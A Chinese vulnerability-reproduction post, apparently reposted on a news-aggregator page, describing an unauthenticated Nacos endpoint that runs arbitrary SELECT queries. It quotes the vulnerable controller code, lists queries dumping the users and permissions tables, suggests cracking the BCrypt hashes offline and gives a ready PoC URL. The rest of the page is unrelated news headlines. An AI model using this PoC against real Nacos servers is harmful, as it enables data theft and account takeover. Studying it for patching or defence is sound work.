天天微动态丨【漏洞复现】Nacos存在SQL注入漏洞

简介


(相关资料图)

Nacos是阿里的开源项目,应用于微服务,微服务是将单体应用拆分成一个服务节点,nacos的主要功能是服务发现和微服务的配置集中管理。

纳科斯

一、漏洞详情

源码地址:https://github.com/alibaba/nacos

审计代码可以发现,config server中有一个接口,没有做任何的鉴权,即可执行sql语句,可以漏掉全部数据

模块中的漏洞点:nacos-config的com.alibaba.nacos.config.server.controller.ConfigOpsController中

@GetMapping(value = "/derby")public RestResult derbyOps(@RequestParam(value = "sql") String sql) { String selectSign = "select"; String limitSign = "ROWS FETCH NEXT"; String limit = " OFFSET 0 ROWS FETCH NEXT 1000 ROWS ONLY"; try { if (PropertyUtil.isEmbeddedStorage()) { LocalDataSourceServiceImpl dataSourceService = (LocalDataSourceServiceImpl) DynamicDataSource .getInstance().getDataSource(); if (StringUtils.startsWithIgnoreCase(sql, selectSign)) { if (!StringUtils.containsIgnoreCase(sql, limitSign)) { sql += limit; } JdbcTemplate template = dataSourceService.getJdbcTemplate(); List> result = template.queryForList(sql); return RestResultUtils.success(result); } return RestResultUtils.failed("Only query statements are allowed to be executed"); } return RestResultUtils.failed("The current storage mode is not Derby"); } catch (Exception e) { return RestResultUtils.failed(e.getMessage()); }}

可以看到,代码只限制了需要包含select,因此,导向可以执行任意的select查询语句

通过测试,可以用以下的语句查询到所有数据库信息

select * from usersselect * from permissionsselect * from rolesselect * from tenant_infoselect * from tenant_capacityselect * from group_capacityselect * from config_tags_relationselect * from app_configdata_relation_pubsselect * from app_configdata_relation_subsselect * from app_listselect * from config_info_aggrselect * from config_info_tagselect * from config_info_betaselect * from his_config_infoselect * from config_info

最重要的是,该接口不需要任何认证,直接就可以访问

通过读取到账号以及hash之后的密码后,因为nacos创建账号时使用的salt生成算法我们通过开启源的程序源代码已经足够分析出来

查看源码com.alibaba.nacos.console.security.nacos.NacosAuthConfig

@Overrideprotected void configure(AuthenticationManagerBuilder auth) throws Exception { auth.userDetailsService(userDetailsService).passwordEncoder(passwordEncoder());}@Overrideprotected void configure(HttpSecurity http) throws Exception { if (StringUtils.isBlank(authConfigs.getNacosAuthSystemType())) { http .csrf().disable().cors() // We don"t need CSRF for JWT based authentication .and().sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS) .and().authorizeRequests().requestMatchers(CorsUtils::isPreFlightRequest).permitAll() .antMatchers(LOGIN_ENTRY_POINT).permitAll() .and().authorizeRequests().antMatchers(TOKEN_BASED_AUTH_ENTRY_POINT).authenticated() .and().exceptionHandling().authenticationEntryPoint(new JwtAuthenticationEntryPoint()); // disable cache http.headers().cacheControl(); http.addFilterBefore(new JwtAuthenticationTokenFilter(tokenProvider), UsernamePasswordAuthenticationFilter.class); }}@Beanpublic PasswordEncoder passwordEncoder() { return new BCryptPasswordEncoder();}

可以看到,都是默认的,使用者没有办法做修改

因此,参考工具类com.alibaba.nacos.console.utils.PasswordEncoderUtil

通过这种方式,可以在本地区快速的爆破出哈希值显示的密码

package com.alibaba.nacos.console.utils;import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;/** * Password encoder tool. * * @author nacos */public class PasswordEncoderUtil {        public static void main(String[] args) {        System.out.println(new BCryptPasswordEncoder().encode("nacos"));    }        public static Boolean matches(String raw, String encoded) {        return new BCryptPasswordEncoder().matches(raw, encoded);    }        public static String encode(String raw) {        return new BCryptPasswordEncoder().encode(raw);    }}

二、漏洞复现

poc:

/nacos/v1/cs/ops/derby?sql=select%20*%20from%20users%20"

nacos url后拼接即可

标签:

天天微动态丨【漏洞复现】Nacos存在SQL注入漏洞

简介Nacos是阿里的开源项目,应用于微服务,微服务是将单体应用拆分

06-01 12:05:26

差20多天就过年了 适合过年穿的衣服搭配?

适合过年穿的衣服搭配?差20多天就过年了,相信很多小仙女都已经买好了

06-01 11:39:24

全球滚动:国防部新闻发言人就美炒作 中方“拒绝”两国防长会晤提议事答记者问

【新华社北京5月31日电】国防部新闻发言人谭克非5月31日就美炒作中方“

06-01 10:58:07

【世界播资讯】12345设专席,为未成年人保护加码赋能

新修订的《北京市未成年人保护条例》(以下简称《条例》)近日经第十六

06-01 10:00:18

全球速读:东部新区第三届中小学生艺术节展演在成都实小东部新区校区精彩上演

近日,成都市实验小学东部新区校区举行“爱成都,迎大运”成都东部新区

06-01 09:28:15

热资讯!马斯克深夜访问特斯拉上海超级工厂

特斯拉CEO马斯克的私人飞机北京时间5月31日21时26分落地上海虹桥机场,

06-01 08:32:20

观察:上海立达学院有哪些专业 上海立达学院专业排名

上海立达学院怎么样好不好?附上海立达学院最好的专业排名及王牌专业介

06-01 07:29:59

天天热议:梦见薄纱是什么意思(梦见纱布什么意思)

1、梦见薄纱,薄纱若隐若现的感觉,会让你觉得不真实。预示着你最近会

06-01 06:45:44

又一种“新型”病毒在美国肆虐?专家:症状与普通感冒相似_环球讯息

受访专家:清华大学第一附属医院感染科主任张维燕清华大学第一附属医院

06-01 06:03:50

卖房子的人演员表_卖房子的人_世界热门

1、卖房前途无限,但是真要踏入房地产,还请慎重考虑。2、要么活的更好

06-01 04:56:53

世界快资讯:鞍重股份:控股子公司拟增资扩股引进战投赣锋锂业

证券时报e公司讯,鞍重股份(002667)9月26日晚间公告,公司控股子(孙)

06-01 02:53:00

价格真香,为马粉们多了一个购车理由 CX-50行也上市-每日速看

马自达一直以偏执的态度,不想迎合所有人,只想让懂它的人享受“人马合

06-01 01:08:03

红烧羊排骨的家常做法_红烧羊排最简单的做法

你们好,最近小品发现有诸多的小伙伴们对于红烧羊排骨的家常做法,红烧

06-01 00:19:02

简讯:pid公式推导 pid公式

今天来聊聊关于pid公式推导,pid公式的文章,现在就为大家来简单介绍下

05-31 23:17:13

世界微动态丨古代神医穿越现代韩国电视剧_古代神医

1、扁鹊、华佗、孙思邈、张仲景、皇甫谧、葛洪、朱震亨、李时珍、钱乙

05-31 22:11:11

天天热头条丨日本专家:美国指手画脚 促使日本走上危险的防卫路线

当地时间5月30日,数百名日本民众举行抗议活动,反对日本政府大幅增加

05-31 21:57:49

世界通讯!宝贝你夹轻点我受不了漫画(班长你轻点灬爽灬宝贝一)

每日小编都会为大家带来一些知识类的文章,那么为大家带来的是班长你轻

05-31 20:47:58

微动态丨豪森股份(688529.SH)与沃尔沃汽车签订总价9.91亿元交钥匙项目合同

智通财经APP讯豪森股份688529SH公告公司全资子公司大连豪森瑞德设备制

05-31 20:20:44

龙泉驿区仁爱社区卫生服务中心120人份九价Hpv疫苗到苗通知

预约须知本次可预约人份:120人份。接种对象:根据说明书要求,年龄16-

05-31 19:22:06

2023年成德眉资“迎大运·保平安”防汛联合演练顺利举行

四川经济网讯(记者刘婕)5月31日,成都市、德阳市、眉山市、资阳市四

05-31 18:24:55

散兵BOSS战斗曲《三千娑世御咏歌》拉丁语部分翻译(拉-英-中三语对照+逐句注释)-世界新资讯

译者文采一般,所以可能翻不出“诗歌”的调调,就纯直译,拉丁语水平也

05-31 14:51:25

学生必看十大励志电影 初中生暑假电影推荐|播资讯

学生必看十大励志电影:《当幸福来敲门》、《跳出我天地》、《穿普拉达

05-31 14:41:21

【全球热闻】乔恩琼斯(乔恩)

每日小编都会为大家带来一些知识类的文章,那么为大家带来的是乔恩方面

05-31 14:08:04

加入抖音公会直播有什么坑?如何退出抖音公会?

很多朋友对抖音公会不太了解,很容易加入进去,但是加入抖音公会直播的

05-31 13:56:30

微软:6 月 15 日六款游戏将从 Xbox Game Pass 库中移除

IT之家5月31日消息,微软昨日发布公告称,将在6月15日从XboxGamePass中

05-31 13:14:58

三名游客登山遭雷击,专家提醒48小时内应住院观察

人民日报健康客户端记者武星如据“都市快报橙柿互动”5月28日报道,一

05-31 13:02:02

蛋白质纳米“计算机”问世:未来有望治疗癌症|全球聚看点

快科技5月31日消息,美国宾夕法尼亚州立大学团队创建了用作电路的第一

05-31 12:38:26

探索负面清单式经费管理,上海推动新型研发机构高质量发展

对承担战略性任务的新型研发机构,应围绕国家和上海科技创新战略和重大

05-31 11:59:18

新生儿危重症监护诊疗与护理_关于新生儿危重症监护诊疗与护理简介-焦点

1、《新生儿危重症监护诊疗与护理》是2009年人民卫生出版社出版的图书

05-31 11:39:59

环球热讯:如何遏制校园安全事故发生?多部门明确了→

5月30日,教育部会同公安部、国家卫生健康委、市场监管总局等部门召开

05-31 11:16:53

法网|兹维列夫晋级第二轮 环球时快讯

当地时间5月30日,在2023法国网球公开赛男子单打首轮比赛中,德国选手

05-31 10:53:59

【世界热闻】交通运输部:取消道路客运车辆90%的客座率限制

在3月25日举行的交通运输部发布会上,交通运输部新闻发言人孙文剑表示

05-31 10:29:11

蹲点日记|送一天外卖,两人共挣45元 当前聚焦

【蹲点日记】原标题:通过角色体验,我们真切体会到外卖骑手的艰辛不易

05-31 10:01:58

总投资91.5亿元!聆达股份20GW高效光伏电池片项目落地安徽铜陵

近日,聆达股份发布公告,拟与铜陵狮子山高新区管委会协调的有关基金共

05-31 09:36:31

多家银行宣布:清理这类账户!_全球微动态

5月29日,农业银行发布公告称,为防范电信网络新型违法犯罪,切实保障

05-31 09:39:09

趣睡科技:融资净偿还53.77万元,融资余额2309.65万元(05-30)

2023年5月30日趣睡科技融资净偿还53 77万元,融资余额2309 65万元

05-31 08:59:14

描绘高质量发展新画卷 天天视点

本网讯(记者汤超)能折叠的屏幕、会说话的机器人、会动的玻璃材料……

05-31 08:18:26

t2330可以升级的cpu_t233

1、c语言中uchart=233是定义一个无符号字符型变量并且初始化它的值是23

05-31 07:50:47

Gala抵达LNG俱乐部,参观基地训练环境豪华,和RNG差距太大!

在不久前2023LPL夏季转会期结束后,最为重磅的一笔转会交易莫过于RNG的

05-31 07:36:08

每日视讯:体验35万最值得买的家用SUV 蔚来全新ES6只有一个缺点?

在蔚来的二代车中,真正走量的ET5的销量并没有取得爆款,真说“你买我

05-31 06:58:56

热点评!哈哈芜湖什么意思_芜湖什么意思

1、芜湖原本是一个地名,指中国安徽省芜湖市,由于网络上频频掀起浪潮

05-31 06:55:21

多部门联动护航 灵活就业举措上新

新经济业态催生新就业形态,近年来我国灵活就业群体规模日益壮大。据统

05-31 06:11:34

世界热议:“云医院”来了 手机就能看X光片

每天在我们身边都发生着许多新鲜事,当下的实时热点,最热话题。我们应

05-31 06:10:07

大牌来袭!曝阿代米队友今夏将加盟中超,2豪门有望捡漏欧洲国脚

时间过得很快,转眼间5月马上就要过去,6月即将到来。目前中超联赛正好

05-31 05:25:47

生态民主_关于生态民主介绍

生态民主,关于生态民主介绍这个很多人还不知道,我们一起来看看!1、《

05-31 04:55:48

小学班规奖惩办法_小学班规

1、小学班规:一、班规应以个性化为取向,二、班规应以发展性为取向。2

05-31 03:39:54

中国平安上线员工碳账户,升级1+N碳账户体系助推绿色发展

5月27日,在中国平安成立35周年的司庆表彰活动上,平安集团宣布正式上

05-31 03:31:51

新加坡主权财富基金GIC将斥资约20亿欧元收购梅塞尔约25%股份

新加坡主权财富基金GIC将斥资约20亿欧元收购梅塞尔约25%股份:知情人士

05-31 02:14:55

每日观点:上海整治违规打新,总价近亿红盘云锦东方叫停摇号,重点审核假结婚问题

本文来源:时代财经作者:钟黛“一日夫妻”挤爆售楼处,上海网红热盘云

05-31 00:39:25

全球观察:多地拉响高温警报,用电高峰将至

多地拉响高温警报,用电高峰将至

05-31 00:30:49

【原】除了苗种的窘迫,代谢性障碍是饲料鳜的另一绊脚石!
东达驾校报名费多少钱一学期(东达驾校报名费多少)_环球新要闻
全球热推荐:广西桂林市市场监管局发布金饰消费提示
世界观速讯丨脑机接口概念股大涨 多家公司表示“与我无关”
世界球精选!股市板块有哪些
美国枪击事件接连发生 枪支暴力难消
十余只小“獴”物搬新家啦!长沙生态动物园新建獴馆建成启用
喝红酒好还是喝白酒好?
中国星辰|任重道远 中国空间站全面建成后“任务表”公布_天天速读
萍乡卫校毕业考什么(萍乡卫校)|世界信息
AI复原珍妃真实相貌,长得实在是太漂亮了,难怪光绪皇帝如此宠爱她 环球关注
美的酷省电系列1.5匹空调性价比如何?_世界热门
焦点速读:联盟30队最新估值!篮网35亿,湖人59亿排第三,勇士老板真赚翻了
中国供应链金融行业市场发展现状 中国供应链金融行业市场前瞻
怒砸13亿!小鹏觉醒了
Steam周销榜:《逃生试炼》夺冠卫冕 《街霸6》登榜
天天要闻:传承红色基因,湖湘少年在深情吟诵中浸润童心
像不像?姆巴佩晒自己分别在儿时&现在与亨利的合照
莱州市教育信息官网(莱州教育信息网)-环球要闻
最新5年高考满分文精品_对于最新5年高考满分文精品简单介绍|环球热头条
风投成“张一鸣们”抵御焦虑的良药?
石家庄桥西区税务:便民服务暖人心 惠企实事助发展-全球最新
每日视点!一季度巨亏23.4亿,小鹏汽车还有救吗?
学大教育(000526):5月30日13时25分触及涨停板|当前热点
世界观速讯丨陕西发现一处商代高度发达的青铜文明和区域政治的中心
天玑9300要绝杀:采用4+4全大核架构 性能狙击A17功耗大降
商品期货收盘跌多涨少,沪锡涨近3%,纯碱、玻璃跌超3% 焦点讯息
售19.98万元起 新款大通大家MIFA6上市
港股异动 | 博维智慧(01204)午后涨超10% 报道称公司年内可发布首款应用于消费领域的穿戴式脑机产品 世界新视野
造梦西游龙女转职_造梦西游5龙女转职哪个好
暖心牵手 与爱“童”行-播资讯
子丑寅卯辰巳午未申酉戌亥对应生肖表_子丑寅卯辰巳午未申酉戌亥对应的生肖
当前观察:一年亩收入5万的药材_种什么中药材最挣钱
颐和园主要景点介绍_颐和园主要景点有哪些
秘鲁伊卡大区近万人感染登革热 死亡人数上升至30人_环球实时
法网第2比赛日综述:德约阿卡均横扫过关,张之臻迎大满贯首胜
每日热讯!港服PS+三档新增试玩游戏:《足球经理2023》
2023-2024年中国代餐行业:中国代餐市场规模呈持续增长的态势|天天亮点
二手房挂牌量“升”交易量“降” 市场信心整体有待恢复
【全球报资讯】国庆节儿童画简单漂亮-国庆儿童画
生化危机女主爱丽丝_生化危机女主
全球热推荐:有根的文学:文化视野下的中国现当代文学取样(关于有根的文学:文化视野下的中国现当代文学取样介绍)
天天滚动:20万个岗位促大学生就业
运营总监的计划方案_运营总监
吴克群结婚了吗_吴克
全球观察:急着去开会路上颠簸电脑掉了,辅警帮助寻回
东南亚跨境电商平台有哪些 想做东南亚的商品有做东南亚跨境的电商平台么 天天观察
全国攀岩好手齐聚绍兴 谁能搭上杭州亚运会末班车
*ST搜特最新公告:公司股票及可转债将被终止上市-环球百事通
武邑县举办首届枣花节 当前讯息
x 广告
x 广告

Copyright ©  2015-2022 欧洲纤维网版权所有  备案号:沪ICP备2022005074号-23   联系邮箱: 58 55 97 3@qq.com